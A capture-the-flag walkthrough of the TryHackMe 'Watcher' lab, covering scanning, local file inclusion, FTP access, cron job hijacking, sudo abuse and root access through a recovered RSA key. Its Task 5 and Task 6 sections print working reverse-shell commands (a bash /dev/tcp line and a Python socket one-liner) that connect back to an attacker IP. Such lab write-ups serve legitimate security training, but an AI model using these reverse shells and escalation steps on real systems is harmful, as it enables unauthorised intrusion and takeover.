TryHackMe: Watcher
Today we will take a look at TryHackMe: Watcher. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes. Good luck
Recon:
- Network scan
Nmap (“Network Mapper” is a network scanner)
Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.34.79
- URL discovery
Gobuster ( Gobuster is a tool used to brute-force URIs including directories and files)
Command: gobuster dir -u http://10.10.34.79 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.html
> Now let’s look at the tasks
Task 1: Flag 1
> Let’s check the directories we found
We found the direction of Flag 1
Task 2 : Flag 2
> When we look at the product page, we see that we have found LFI(Local File inclusion).
> Let’s note the usernames we found
> Check in the previous directory.
> Here is the username and password for ftp. We even found ftp directories. > Let’s check now
Command: sudo ftp $IP
> Here we found flag 2
Task 3: Flag 3
> Use the /files folder here to get the reverse shell.
> Listening with Netcat (utility program supports a wide range of commands to manage networks and monitor the flow of traffic data between systems.)
Command: nc -nvlp 1234
> Spawning a TTY Shell
Command: script /dev/null -c bash
> To find Flag 3
Command: find 2>/dev/null | grep flag_3.txt
> Here we found flag 3
Task 4: Flag 4
> The sudo -l (list) option will list the allowed (and forbidden) commands for the invoking user
Command: sudo -l
> We have the authority to make the transition to Toby.
Command: sudo -u toby /bin/bash
> Here we found flag 4
Task 5: Flag 5
> Looking at the Jobs file, I found a shell script that you can execute on the terminal.
> I quickly check the crontab ( configuration file that specifies shell commands to run periodically on a given schedule.) and was not mistaken.
> Mat automatically launches this file from time to time
> Then let’s abuse it with a small reverse shell script
Command: echo “bash -i >& /dev/tcp/10.8.223.65/4242 0>&1” >> cow.sh
> Let’s listen
Command: nc -nvlp 4242
> Here we found flag 5
Task 6: Flag 6
> Check list the allowed commands
Command: sudo -l
> We can run code written in python as Will.
> Let’s check the code and understand how it works
> If we select the “2” command, it must provide id information. Let’s check
> Everything is clear. Let’s take advantage of it
Note: Python programming language will be very useful for us in this way. If you find it difficult and confusing, you can learn everything easily and practically from the site I will recommend to you. I am currently studying on too.
> Now let’s get a python reverse shell script that can use the site I mentioned.
> Let’s add.
Command: echo ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.8.223.65”,5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”])’ > cmd.py
> And listen
Command: nc -nvlp 5555
> Spawning a TTY Shell and check folder
> Here we found flag 6
Task 7: Flag 7
> When we write id, we see that Will belongs to another group.
Command: id
> It’s time to root.
> Let’s use Linpeas (Linux local Privilege Escalation Awesome Script (linPEAS) is a script that search for possible paths to escalate privileges on Linux/Unix)
Command: chmod +x linpeas.sh
Command: ./linpeas.sh
> Our attention is drawn to the file encrypted with base64. Let’s check.
> Let’s decrypt
> That’s rsa key.(RSA key is a private key based on RSA algorithm. Private Key is used for authentication and a symmetric key exchange during establishment of an SSL/TLS)
> Let’s connect to root .
Command: ssh root@IP -i root
> And now we are the root
> Here we found flag 7
“If you have any questions or comments, please do not hesitate to write. Have a good days”
